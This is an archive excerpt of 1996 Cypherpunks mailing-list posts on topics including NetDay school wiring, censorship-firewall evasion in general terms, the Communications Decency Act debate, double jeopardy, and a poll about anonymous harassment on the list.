Justice In-Reply-To: Message-ID: At 9:26 pm -0400 9/28/96, snow wrote: > I see no reason that general programming shouldn't be considered a > trade. Maybe more "pure" math than a carpenter, or a mechanic, but they > don't need the english, general history, & etc. that other "academic" > careers need. I have to say I agree with this. I know more than a few kids in my neighborhood who are more than smart enough, if they got over their technophobia and a little innumeracy. They could make more than the average drug dealer's lookout if they were to learn to code. Unfortunately, all the "trade" schools around here teach you to replace boards rather than hack code. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From rah at shipwright.com Mon Sep 30 12:36:45 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 1 Oct 1996 03:36:45 +0800 Subject: LII FYI: NETDAY PRESS CONFERENCE (fwd) Message-ID: Hang on to your wallets, everyone. Your tax dollars at work... Cheers, Bob Hettinga --- begin forwarded text Date: Thu, 26 Sep 1996 16:05:27 -0700 (PDT) From: Peter Marshall To: lii at pobox.com Subject: LII FYI: NETDAY PRESS CONFERENCE (fwd) MIME-Version: 1.0 Sender: owner-lii at majordomo.pobox.com Precedence: bulk Reply-To: lii at pobox.com ---------- Forwarded message ---------- Date: Thu, 26 Sep 1996 08:42:11 -0400 From: Roanne Robinson Reply-To: roundtable at cni.org To: Multiple recipients of list Subject: NETDAY PRESS CONFERENCE The following is a media advisory regarding today's NetDay96 press conference taking place at Hine Junior High School in southeast D.C. If you have any questions about the press conference or NetDay96, please don't hesitate to contact me. You also can find further information about NetDay96 by visiting NTIA's home page at www.ntia.doc.gov. Roanne Robinson National Telecommunications and Information Administration U.S. Department of Commerce ----------------------------------------------------------------------------- For Immediate Release: Contact: Paige Darden September 25, 1996 202-482-1551 ***** MEDIA ADVISORY RE LAUNCH OF NATIONAL NETDAY ***** WASHINGTON, DC -- U.S. Government officials are joining business and community leaders in kicking off national NetDay 96 to wire all K-12 public and private schools in more than 40 states for access to the information superhighway. Businesses, parents, educators, students and community volunteers will come together to wire more than 20,000 schools nationwide. Larry Irving, assistant secretary of Commerce for communications and information, will join U.S. Education Secretary Richard W. Riley to help lauch national NetDay 96. Irving's remarks will focus on the need to make sure that all of America's communities participate in this effort. "We can't afford to leave some of our schools behind -- all of our children deserve access to the tools that will enable them to be full participants in the Information Age," said Irving. WHO: U.S. Secretary of Education Richard W. Riley Assistant Secretary of Commerce Larry Irving NetDay Co-Founder John Gage of Sun Microsystems Robert Goodwin, Points of Light Foundation Corporate Partners, including BellSouth, Cisco Systems, MCI, Apple, AT&T, and others. WHEN: Thursday, September 26, 1:15 p.m. WHERE: Hine Junior High School 8th Street and Pennsylvania Avenue, SE Like California NetDay, national NetDay 96 will follow the classic barn-raising tradition. It will build on California NetDay, in which more than 20,000 volunteers came together in March 1996 to connect over 2,600 schools to the Internet. For more information, please call Anna Erdreich, U.S. Department of Education, 202-401-4389, or Paige Darden, Department of Commerce's National Telecommunications and Information Administration (NTIA), at 202-482-1551. ### --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From moroni at scranton.com Mon Sep 30 12:57:53 1996 From: moroni at scranton.com (Moroni) Date: Tue, 1 Oct 1996 03:57:53 +0800 Subject: Utah as a Religious Police State [RANT] In-Reply-To: <324FD588.3FF2@gte.net> Message-ID: Dale I wouldn't worry about the mountain and what is under it. It is only genealogical stuff. Salt lake has to wait 100 years or 99 (i Forget) in order to be able to make the records public. The SSA makes death info available as soon as the body is cold. And that is on cd rom. Most banks have contingency plans for having intact records in case of nuclear or civil disturbance. Again it is under the mountains . As for costs ,the full amount of the custodial costs are born by members. Originally it was by donations of money and I think now it is taken from the tithe. That is a sum in excess of 1 billion dollars by the members. On Mon, 30 Sep 1996, Dale Thorn wrote: > On the below: Gentiles (and Jews) are *very* afraid of Mormons. Maybe > it has something to do with the World's Largest Database (on non-Mormons > especially) they keep under that mountain near SLC Utah. > > Moroni wrote: > > I never cease to be surprised by the interest that gentiles show in > > working mormon communities while totally neglecting their own failing > > areas. > > > On Sun, 29 Sep 1996, Timothy C. May wrote: > > > (I received this message, with "cypherpunks at sybase.com" as well as > > > "tcmay at sybase.com" (???) cc:ed, so I assume this message was intended for > > > the Cypherpunks list, with some sybase domain name weirdness, or reflector, > > > going on.) > > > > At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote: > > > >I guess that depends on your definition of liberty. The Mormons > > > >originally moved there to have a place to practice their religion, > > > >and have freedom from persecution. I suppose one could extend that > > > >to wanting a place to have the freedom to have a set of rules consistant > > > >with their beliefs. Should that include freedom from interferance from > > > >folks such as yourself who want to change their rules, even though > > > >you're not presently effected? > > > > > > Well, if Utah can rig a way to _secede_ from the Union, your arguments > > > would make more sense. But so long as they are part of these United States, > > > their religious beliefs about when children should be at home cannot > > > supersede basic liberties. > > [additional text deleted] > From scottb at aca.ca Mon Sep 30 12:58:42 1996 From: scottb at aca.ca (scottb at aca.ca) Date: Tue, 1 Oct 1996 03:58:42 +0800 Subject: PRNG discussions Message-ID: <96Sep30.110001edt.15713@gateway.aca.ca> Hi, I was wondering if anyone has kept an archive of old disscusions on PRNG's. I am playing around with a few ideas, and don't want to re-invent the wheel. Does anyone know of any FTP sites containg this sort of thing?? /sb From perry at piermont.com Mon Sep 30 13:11:01 1996 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 1 Oct 1996 04:11:01 +0800 Subject: the theory of split currency In-Reply-To: Message-ID: <199609301523.LAA15152@jekyll.piermont.com> > Is there a name for a dual or split currency, in which > there is one currency for domestic use and another, different > appearing, currency for foreign usage? I don't know of such a name, however... > Does anyone know of any country which has had such a > split currency? ...this has been a common situation, in fact. South Africa, China, the Soviet Union, and other unpleasant places have repeatedly done this. Its usually a remarkably stupid idea. Perry From gary at systemics.com Mon Sep 30 13:57:45 1996 From: gary at systemics.com (Gary Howland) Date: Tue, 1 Oct 1996 04:57:45 +0800 Subject: Tools for Rendering Censorship Firewalls Ineffective In-Reply-To: <199609300305.UAA03732@netcomsv.netcom.com> Message-ID: <324FE61D.15FB7483@systemics.com> Bill Stewart wrote: > > The obvious techniques I can see include > 1) Filter on IP address (e.g. German attack on XS4ALL) > 2) Filter on DNS Name > 3) Filter on Patterns in URL > 4) Filter on Patterns in PUT/GET Requests > 5) Filter on Patterns in Response. > 6) Traffic Analysis on reading patterns > > 1) It's easy to evade the crude version of this attack - use rolling IP > addresses, and use DNS to publish the new ones. For the German model, > where the government has to tell the ISPs who to block, this wins. > They can counter by blocking your whole IP network, not just a single > machine, which you can counter by hopping IP networks as well as hosts, > though that's more trouble (and blocking routes is probably easier > than blocking hosts, since you do it at the routers, and harder to > get people to turn back on.) They can also enforce boycotts on the ISP, > as they did with XS4ALL - blocking most of the traffic to a site > can affect its other traffic enough to be economically annoying. I would guess that most sites censoring http by IP would be doing so by only censoring the http port. If the http servers were to be run on other ports too (perhaps well known ports like DNS), then this would make life a little harder for the bad guys. This would be especially true if their routers were configured to allow ALL DNS requests through (for example). This may be a problem for some browsers (I know it's a problem with netscape), as I mentioned a few weeks ago. > What other kinds of attacks are there? What other defenses? > What kinds of holes are there in these defenses? I have some encrypted HTTP relay software if anyone is interested in setting up a server. Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From dustman at athensnet.com Mon Sep 30 14:09:01 1996 From: dustman at athensnet.com (Dustbin Freedom Remailer) Date: Tue, 1 Oct 1996 05:09:01 +0800 Subject: ASAP letter on e-cash Message-ID: <199609301455.KAA00838@godzilla.athensnet.com> It seems our own Jim Ray has gotten published again, this time in Forbes ASAP's letters section ((Oct.7, page 18). A bit partisan-Libertarian, but good job, Jim. From declan at well.com Mon Sep 30 14:22:38 1996 From: declan at well.com (Declan McCullagh) Date: Tue, 1 Oct 1996 05:22:38 +0800 Subject: Bruce Taylor vs. John Perry Barlow, in HotWired's Brain Tennis Message-ID: ---------- Forwarded message ---------- Date: Mon, 30 Sep 1996 08:17:22 -0700 (PDT) From: Declan McCullagh To: fight-censorship at vorlon.mit.edu Subject: Bruce Taylor vs. John Perry Barlow, in HotWired's Brain Tennis Taylor and Barlow have been battling it out in a HotWired Brain Tennis match for the last week. Check out some excerpts lobbed across the, um, neural nets... -Declan ********** Linkname: Wired Online: Brain Tennis URL: http://www.hotwired.com/braintennis/ --- Bruce Taylor, president of the National Law Center for Children and Families and a leading advocate of the Communications Decency Act, was also formerly a US Department of Justice and city of Cleveland prosecutor. John Perry Barlow is an Electronic Frontiers Foundation co-founder, member of The Well's board of directors, author, retired Wyoming cattle rancher, and lyricist for the Grateful Dead. --- Friday, 27 September 1996 Post No. 5 of 8 by Bruce Taylor I got you now, John Perry. You say "First Amendment!" However, not all detrimental speech is protected - treason, false advertising, defamation, obscenity, child porn, and incitement to violence. Indecent speech that's not obscene is protected among adults, but there's no constitutional right to provide it to minors. If you call up the rule of law ("This is a Nation of laws, not of men"), you are bound by its limits. The Supreme Court recognizes limits for indecent mass communications. The Court didn't say "less" restrictive (as the ACLU does - no law, less law, parent's problem), but asked whether the method chosen by Congress is the "least" restrictive means that is still effective in achieving its purpose. Big difference. State display laws don't say parents keep kids from stores, it says stores put porn out of reach. Dial-a-porn laws don't deny phones to kids or say warnings are enough, but require credit cards or PINs for adults to access sex messages. Responsible adults should take good faith steps that are effective for all but "the most enterprising and disobedient young people." Can adults obtain adult speech while shielding it from most kids? That is all the law and Supreme Court ask. Why ask adult society to help protect our children? Why not just leave it up to each parent? Why not rejoice in the public profanities your children hear on the subway? Because children have rights to a "decent society." Your child may hear cursing on subways, but New York's display law keeps Hustler centerfolds off walls and news racks. So you, too, benefit from what other adults must do in deference to your children. The Internet should not remain an "adult" bookstore for kids any more than Times Squares' should be open to kids. I also got you on philosophy, dear John. Our "'60s humanitarianism" was for social commitment, working together, selfless love for all the peoples of the world. Remember? Your refusal to hide your precious porn from the public Web seems like callous indifference to what kids will endure. To me, your position is appositive to true "liberalism." You sound like an elitist technohippie who can take care of his own, but doesn't care what kids would see, seek, suffer, or be seduced by. You're probably richer than I, maybe even smarter, but your protest has a bit of a whine. The CDA only asks Internet users to shield kids so kids can use it, too, and asks industry to give us the means of doing online what we do everywhere else. Use your brain and heart to help find the ways, to pressure the techno-industrial complex, to help make the Internet safe for kids. Try it, you'll like it. ************ On Friday, Bruce Taylor said "children have rights to a 'decent society.'" Today, Barlow replies "You will not be happy until you have imposed your moral code on the rest of humanity." Can we expect the world to share the same concept of "decency"? Discuss in Threads.... Monday, 30 September 1996 Post No. 6 of 8 by John Perry Barlow Bruce, remember what I said in my first post about shadowboxing? We're there, pal. You and I are not talking about the same "place." You're talking about physical, walking-around reality within a quaint conceit called the United States of America, and I'm talking the seamless and global continuity that is cyberspace. Now I will confess I misdirected the flow myself by referring to the First Amendment. I never should have done that, but I was strangely drawn into your reality-distortion field by all that talk about what "no one has the right to say." Utterly knee-jerk of me. I apologize. But here's the terrible truth of it: These obscenity statutes you cite, along with the First Amendment itself, are all local ordinances. Even the treaty to which you apparently refer offers spotty coverage as it has only six official signatories, as far as I can tell. There is not a single government on this Earth that has the right to regulate the rest of it. For better or worse. There are days when I wish there were. Certainly I would be delighted if I thought the protections in the Bill of Rights could be afforded to all God's children, just as you would no doubt be delighted if the sexual-conduct laws of Saudi Arabia could be applied to all "enterprising and disobedient young people," wherever their dirty minds be housed. But they can't. And unless the United Nations becomes a lot more effective, there will never be a world government sufficient to convey such rights or restrictions. So, should either of us wish to restrict or maintain liberty on the Internet, we can't turn to government to assist us. We are stuck with governance, which is to say, the order that arises from social etiquette, cultural ethics, practicality, and technological architecture. There is, in fact, plenty of comfort both of us can take from these. Since I am, as you charge, a technohippie, I'm convinced that as long as the Internet remains a packet-switched network, it will be very difficult to control the content of the whole. On the other hand, as long as there are folks like yourself who wish to construct sanitized zones within it, that same technical characteristic makes it fairly easy to filter out most of the tainted packets and to observe very carefully, as they do at both my daughter's high school and in Singapore, who is attempting to get what. We are looking at opportunities for global liberty and local authoritarianism, and that should make us both happy. But you and the rest of your kind in the US Congress wish to think locally and act globally. You will not be happy until you have imposed your moral code on the rest of humanity. And I can imagine few aspirations more elitist than that, Bruce. ### From declan at well.com Mon Sep 30 14:31:12 1996 From: declan at well.com (Declan McCullagh) Date: Tue, 1 Oct 1996 05:31:12 +0800 Subject: Katz on cypherpunks, in HotWired's Media Rant Message-ID: [Background: the cypherpunk/pw:cypherpunk account used for HotWired's Threads discussion section has been used for anonymous flaming and attacks. --Declan] Linkname: The Netizen - Media Rant - Jon Katz URL: http://www.netizen.com/netizen/96/40/katz0a.html HotWired The Netizen 30 Sep 96 [...] In addition, the digital culture has long been demonized by the outside world and is inherently defensive and edgy. Cypherpunks give us fascinating insights into this subject, since their equivalent exists in no other medium, and they epitomize the often mindless verbal violence that characterizes some parts of the Net. Their original purpose - techno-anarchy and advocating unfettered access to information - conflict head-on with the Web's mainstreaming and the arrival of the newly wired middle class. Cypherpunks don't want real confrontations or discussions, or they would reveal their identities and make it possible to respond, as most flamers do. They are among media's rarest and at the same time most easily recognized subspecies: nihilists. Anonymous communication makes verbal violence easy. Since most flamers don't know their targets and won't ever meet them, it's easy enough to attack individuals and question personal motives, with none of the social consequences of face-to-face verbal assaults. And Net communication also offers no filter: because it's instantaneous, people often don't take the time to cool off, reflect, or take another look at the messages they mail and post. When tempers flare here, it doesn't even take the time of a phone call to pop off. So, hostile messages are often impulsive and frequently regretted, apologized for, or taken back and clarified. Since the Net makes communication so easy, it makes corrections, criticism, and discussion inevitable. Nobody who writes or posts on the Web should expect anything less than sustained and continuous challenge and critique, something that is rarely permitted in mainstream journalism. Web writers and posters have to see these as integral to their work - not simply attacks - and as healthy antidotes to conventional media arrogance and elitism. Accompanying the hundreds and hundreds of personally assaultive messages I've gotten - as opposed to the thousands of simply critical ones - there is a strange and recurring phenomenon: If you respond quickly and respectfully, the overwhelming majority of hostile emailers either apologize, change their tone, or write back in a more reflective, serious, or friendly way. Most of these posters are stunned that anyone read their mail in the first place, or, even more amazingly, responded to it. [...] From tcmay at got.net Mon Sep 30 14:48:49 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 1 Oct 1996 05:48:49 +0800 Subject: active practice in America In-Reply-To: <199609290438.WAA23813@infowest.com> Message-ID: At 11:32 PM -0700 9/29/96, Dale Thorn wrote: >Speaking of peers, what would the founding fathers have said about the >trial of the officers in the Rodney King case? Would they, as police >officers, have a right to a jury of their peers? Would their peers be >the people in Simi Valley, where many or most of them live? Or would it >be more appropriate to have a jury of the victims' peers? Or both? More importantly, what's happened to "double jeapardy"? The four cops were found "Not Guilty" in their criminal trial (or at least three of them were...I forget the details--one may have been a mistrial). So, as some people then proceeded to burn down their neighborhoods, loot, and run amok in the streets for several days, a _second_ trial was held. This time the verdicts were more in line with what the street wanted, plus, all the good electronics stores had already been looted or had moved out of South Central, so no riots. (Legal purists will point out that the second trial was for "Federal civil rights violations." Harummphh. What would the Founders think of this logic: "First we try them on ordinary criminal charges. If they are found Not Guilty, we charge them in the next higher court with more abstract charges. If they are still found found Not Guilty, we hit them with "civil rights" and "being disrespectful to women" charges. And if that doesn't work, we charge them in the World Court. We've only had one guilty party get past them, and for that guy we appealed to the Pope and he put a Papal Hex on the guy and ordered him burned in oil.") Double jeapardy means the system gets one shot at proving charges, not two or three. (And, yes, even though I am sure O.J. Simpson killed those two people, I am not happy with what appears to be a _second_ trial. For sure, it's a _civil_ trial, for damages, but to this layman it looks like a second trial on the main charges. I suppose I always thought that being found "Not Guilty" on the act itself made it essentially impossible for a civil trial to redecide the same issue. Boy, was I wrong.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From sandfort at crl.com Mon Sep 30 14:53:57 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 1 Oct 1996 05:53:57 +0800 Subject: POLL RESULTS Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Last week I offered an informal poll as to the reputational effect of "John Anonymous MacDonald" and other apparent nyms. I received responses from 31 of you. All were signed by known Cypherpunks; none were anonymous. I was not surprised to find absolutely zero respect for "Anonymous." In addition, there were no negative comments about Tim and in most cases, high marks for his restraint and dignity under the circumstances. Perhaps not so surprisingly, a significant number of you expressed the belief that the "Anonymous" posts come from Demetri Vulis. Following, are a few samples of what respondents had to say. (They are reproduced without atribution because I had not asked permission to do so in my origninal poll request.) S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Clearly, John Anonymous MacDonald is losing points. Tim's reputation is unaffected. ... I'd be suprised if anyone regarded Anonymous with any degree of respect anymore. As for Tim May, he already had a good rep in my book to start with, and by not responding in a similar matter (at least not publicly) to these people, his reputation is enhanced even more. ... Who is John Anonymous MacDonald...We can only surmise that his real joy is playing with himself in public. ... Anonymous is a total moron who'd be annoying me greatly if I hadn't managed a decent killfile. ... The posts are idiotic and childish, and reflect quite badly on the sender (presumably Dmitri Vulis KOTM). If anything, they provide a reason to pay *more* attention to tcmay. ... As with any public display of poor taste, anonymous shows themselves lackjing in judgement. I credit Tim for not responding. ... I personally think that these anonymous attacks are pointless. They are just stupid insults, and they don't do anything negative to Tim's reputation except show that someone likes abusing remailers. Perhaps Tim's reputation may get enhanced by the fact that someone has to go this low to debase him. ... It seems to me that anyone who is unwilling to allow the abused party to respond personally is undeserving of anyone's respect. To feel the need to do it in a public forum with however many thousands of people are on these lists is a sign of insecurity and weakness... ... Tarnished - John Anonymous MacDonald Enhanced - Tim May (due to his restraint!) ... Tim's reputation is definately being enhanced, if it's fair to judge a man by the ememies he keeps. ;) ... ...Since these annoying posts started a week or so ago, I have (for the first time ever) begun killfiling people and messages on the cp list. Right now I am killing all messages from John Anonymous MacDonald, Dmitri Vulis, and any message in the "daily ... regarding TCM" thread(s). I hope this madness can end, so we can get back to more normal traffic levels on the list. ... Dimitri 'Anonymous' Vulis' reputation has gone way out on the negative side. (He's been an obvious nutcase from the start...) TC May's positive reputation has increased from his handling of these attacks. ... This kind of post shows Anonymous to be at the social level of a grade school child. If s/he grows up, I may change my mind. It does nothing to effect my opinion of Tim May... Anonymous is making a public mockery of him/herself. ... The anono-twits lose by a mile.... ...It's not much different from graffiti - some people put up interesting posters on walls and telephone poles, and write interesting stuff on bathroom walls; others scrawl empty vulgarity... ... Anonymous's reputation went instantly from 0 to negative infinity. Tim May's reputation is unaffected. ... It certainly does nothing to harm Tim's reputation, from where I stand. Thank God for procmail! ... Well, as Tim has managed to sit back and take it, and I've killfiled the main perpetrators. I'd say it makes a public mockery of Anonymous. ... ...it seems evident that some non-anonymous posters aka KTOM seem to understand how to *abuse* our American freedom's but don't understand about *responsible* use. Is this a deliberate attempt to damage this list or is it that some folk just can't handle freedom? ... ...I killfile Foolish Voolish and most of the others, just because of these ridiculous ad hominem attacks on Tim. ... Anonymous' claims make him look stupid simply because they have no technical or political message - just dirty words...Tim May's reputation is enhanced, I think, by the fact that *other people* come in and dispute Anonymous' claims, over and over again. From rah at shipwright.com Mon Sep 30 14:57:13 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 1 Oct 1996 05:57:13 +0800 Subject: Diffie Speaks at Sun: "Cryptology, Technology, and Politics" Message-ID: --- begin forwarded text From: Rich Lethin Date: Fri, 27 Sep 1996 15:06:20 -0400 To: rah at shipwright.com Subject: [joei at hq.lcs.mit.edu: DLS -- the first one this year] Date: Fri, 27 Sep 1996 14:34:24 -0400 To: seminars at lcs.mit.edu, help-teach at hq.lcs.mit.edu, eecsfaculty at eecs.mit.edu From: joei at hq.lcs.mit.edu (Joei Juanita Marshall) Subject: DLS -- the first one this year DISTINGUISHED LECTURER SERIES DATE: October 17, 1996 TIME: 3:15 - Refreshments 4:00 - Lecture PLACE: MIT, Building 34, Room 101, Vassar St., Cambridge, MA "Cryptology, Technology, and Politics" Dr. Whitfield Diffie Distinguished Engineer Sun Microsystems, Inc. October 17, 1996 Abstract: >From World War I on, interception of communications took its place beside traditional human intelligence as a vital implement of state power. Over the past two decades, a combination of falling costs and new technologies have made high-grade cryptography widely available. This threatens many communications intelligence sources --- though probably not communications intelligence itself. The result has been a series of panicky government attempts to control the spread of cryptographic technology. As long as individuals have access to computers that really `work for them,' such attempts are unlikely to succeed. The opponents of cryptography may, nonetheless, damage both our democracy and our economy with their efforts. Host: Professor Michael Dertouzos Joei Juanita Marshall Massachusetts Institute of Technology Laboratory for Computer Science 545 Technology Square NE43-104 Cambridge, MA 02139 Phone: (617) 253-0145 Fax: (617) 258-8682 --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From tcmay at got.net Mon Sep 30 15:24:09 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 1 Oct 1996 06:24:09 +0800 Subject: POLL RESULTS In-Reply-To: Message-ID: While I didn't respond to Sandy's poll, for the obvious reason plus the reason I use to almost never respond to polls, I'm not surprised at the results. Most of us learn as children that "name calling" is rarely an effective debating technique, and responding to such name calling even less so. (It may be that non-Americans, judging from several recent examples, are not exposed to the "sticks and stones" meme, and assume childish name-calling is effective debate.) A few years ago, when Detweiler was unable to convince people about his points by use of logic, he fell into this path, and ranted on and on for several months, before finally either burning out or having enough accounts yanked for abuse. I think not getting responses from me was what angered him the most. Interesting that Detweiler returned with a _Russian_ nym. Whether Vulis will burn himself out is unclear. Judging by his "spit" page, http://206.124.65.1:80/netscum/, I rather imagine he has a years-long supply of bile stored up. Must have been those cold Russian winters. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From haystack at cow.net Mon Sep 30 15:28:12 1996 From: haystack at cow.net (Bovine Remailer) Date: Tue, 1 Oct 1996 06:28:12 +0800 Subject: [ADMINISTRATIVIUM] A daily warning regarding Tim C. May Message-ID: <9609301727.AA25963@cow.net> Embedded in Tim C. May's babblings are preposterous lies, wild distortions, child pornography (both as graphic descriptions and in JPEG format), ethnic slurs, and racial epithets. From byrd at acm.org Mon Sep 30 15:28:35 1996 From: byrd at acm.org (Jim Byrd) Date: Tue, 1 Oct 1996 06:28:35 +0800 Subject: Looking for Qualified Individual/Firm to Contract for Cryptanalysis Message-ID: <2.2.32.19960930161624.006f43b0@super.zippo.com> At 07:00 AM 9/30/96 -0700, thad at hammerhead.com (Thaddeus J. Beier) wrote: > >I saw this > >> > I am looking for one or more people (or firms) who are qualified to perform >> > world class cryptanalysis work. Please send mail to me at joswald1 at msn.com >> > call in the U.S. at +1 408.479.7874 >> > >> > Jack Oswald > >and then this... > [news about Grady Ward, and the Scientology cult's attempt to decrypt his files] > >The trial is happening in San Jose, and I wouldn't be at all surprised >if the attempted cryptanalysis is happening there, too. They've been >working at it for a few months now. Not necessarily. The answering machine at the phone number listed mentions "RPK" as the company, and this company has non-Grady reasons for looking for these skills. >From their web page at http://crypto.swdev.co.nz/: "The RPK public key cryptosystem provides industrial-strength public key cryptography that's available worldwide. " "You'll find full technical information, free evaluation software and development tools, and details of our SafeCracker Challenge program where you can earn a $$$ REWARD $$$ while trying to put us out of business! " They could just be looking for people to test their own stuff. From terpsrw at wabe.network.com Mon Sep 30 15:29:09 1996 From: terpsrw at wabe.network.com (Randall Terpstra) Date: Tue, 1 Oct 1996 06:29:09 +0800 Subject: Looking for Qualified Individual/Firm to Contract forCrypt analysis Message-ID: <324FF9DB@mnbp.network.com> Nice try bimbo--- 408 is San Jose!! RWT ---------- From: cypherpunks-errors[SMTP:cypherpunks-errors at toad.com] Sent: Saturday, September 28, 1996 3:58 PM To: cypherpunks Subject: Re: Looking for Qualified Individual/Firm to Contract forCryptanalysis Julian Assange writes: > > I am looking for one or more people (or firms) who are qualified to perform > > world class cryptanalysis work. Please send mail to me at joswald1 at msn.com > > call in the U.S. at +1 408.479.7874 > > > > Jack Oswald > > > > Find your father's little black book under the couch? Well, I dialed the number out of curisotity (it's in San Diego). The answering machine says "This is Jack Oswald with R.P.K." Sounds gay. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From mwohler at ix.netcom.com Mon Sep 30 16:44:45 1996 From: mwohler at ix.netcom.com (Marc J. Wohler) Date: Tue, 1 Oct 1996 07:44:45 +0800 Subject: active practice in America Message-ID: <199609301839.LAA05232@dfw-ix11.ix.netcom.com> At 08:45 AM 9/30/96 -0800, you wrote: >At 11:32 PM -0700 9/29/96, Dale Thorn wrote: > >(Legal purists will point out that the second trial was for "Federal civil >rights violations." Harummphh. What would the Founders think of this logic: I am sure you know the reason for the 'civil rights violation laws. In the 50's & early 60's, all while jury's in the deep south refusing to convict obviously guilty white defendants of rape and murder against blacks. What would be *your* remedy in such cases. From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 16:47:33 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 1 Oct 1996 07:47:33 +0800 Subject: Algeria & Censorship Message-ID: <01IA3G4IAXWW8Y57AQ@mbcl.rutgers.edu> While I agree with the Algerian military in preventing an Islamic Fundamentalist takeover (it's one of my examples of situations in which democracy goes wrong), I definitely don't support many of their other actions. Lesser of two evils... -Allen > _________________________________________________________________ > PC Travel > _________________________________________________________________ > SUSPENDED ALGERIAN DAILY OFFERED INTERNET PAGE > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > PARIS (Sep 30, 1996 1:24 p.m. EDT) - A press freedom watchdog on > Monday offered the suspended Algerian daily La Tribune a page on its > Internet site to give it an airing during the six-month ban. > "Thanks to this initiative, these journalists, banned from writing by > the Algerian authorities, will be able to practice their trade again," > the Paris-based Reporters without Borders (RsF) said. > An Algiers court suspended La Tribune for six months on September 3 > over a cartoon mocking the Algerian flag. [...] > Fifty-seven journalists have been murdered by suspected rebels. RsF > said authorities had suspended or seized newspapers on 55 occasions > and 23 journalists had been held for more than 48 hours since the > conflict broke out over the 1992 cancellation of a general election > fundamentalists were poised to win. > Copyright © 1996 Nando.net From tcmay at got.net Mon Sep 30 16:49:15 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 1 Oct 1996 07:49:15 +0800 Subject: active practice in America In-Reply-To: <199609301839.LAA05232@dfw-ix11.ix.netcom.com> Message-ID: At 2:42 PM -0400 9/30/96, Marc J. Wohler wrote: >At 08:45 AM 9/30/96 -0800, you wrote: >> >>(Legal purists will point out that the second trial was for "Federal civil >>rights violations." Harummphh. What would the Founders think of this logic: > >I am sure you know the reason for the 'civil rights violation laws. > >In the 50's & early 60's, all while jury's in the deep south refusing to >convict obviously guilty white defendants of rape and murder against blacks. > >What would be *your* remedy in such cases. Certainly not throwing out the principle of double jeopardy, that a man should only be tried once for the same alleged crime. As for my "remedy," not all injustices can be righted. (The O.J. trial was a case of a mostly-black jury refusing to convict an obviously guilty black defendant....and yet I don't hear calls for a _second_ criminal trial.) As for the historical reasons for the "conspiracy to not take seriously the civil rights of an aggrieved minority" nonsense, isn't it about time to roll back such laws? Whatever the putative justification for such things might have been 30-40 years ago, this is now, that was then. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 16:49:42 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 1 Oct 1996 07:49:42 +0800 Subject: Not reputation again! (Was: The Nature of the Cypherpunks List) Message-ID: <01IA3ETGL27Y8Y57AQ@mbcl.rutgers.edu> From: IN%"gregburk at netcom.com" 25-SEP-1996 07:25:48.98 >You could contend that the Poster With Nothing Better To Do's reputation >is balanced precariously at exactly 0. I would find that a big stretch, >and as above, if that's 0, what's negative? A fully anonymous individual (not a pseudonym or otherwise trackable individual) is inevitably going to have a reputation of 0. It can't be negative; that would be saying that I could flame myself via remailers and _increase_ my reputation if I did it properly. The person can't exactly build up a reputation of above 0, since that would require multiple good postings and/or some form of escrow. -Allen From aaron at herringn.com Mon Sep 30 16:54:05 1996 From: aaron at herringn.com (aaron sommer) Date: Tue, 1 Oct 1996 07:54:05 +0800 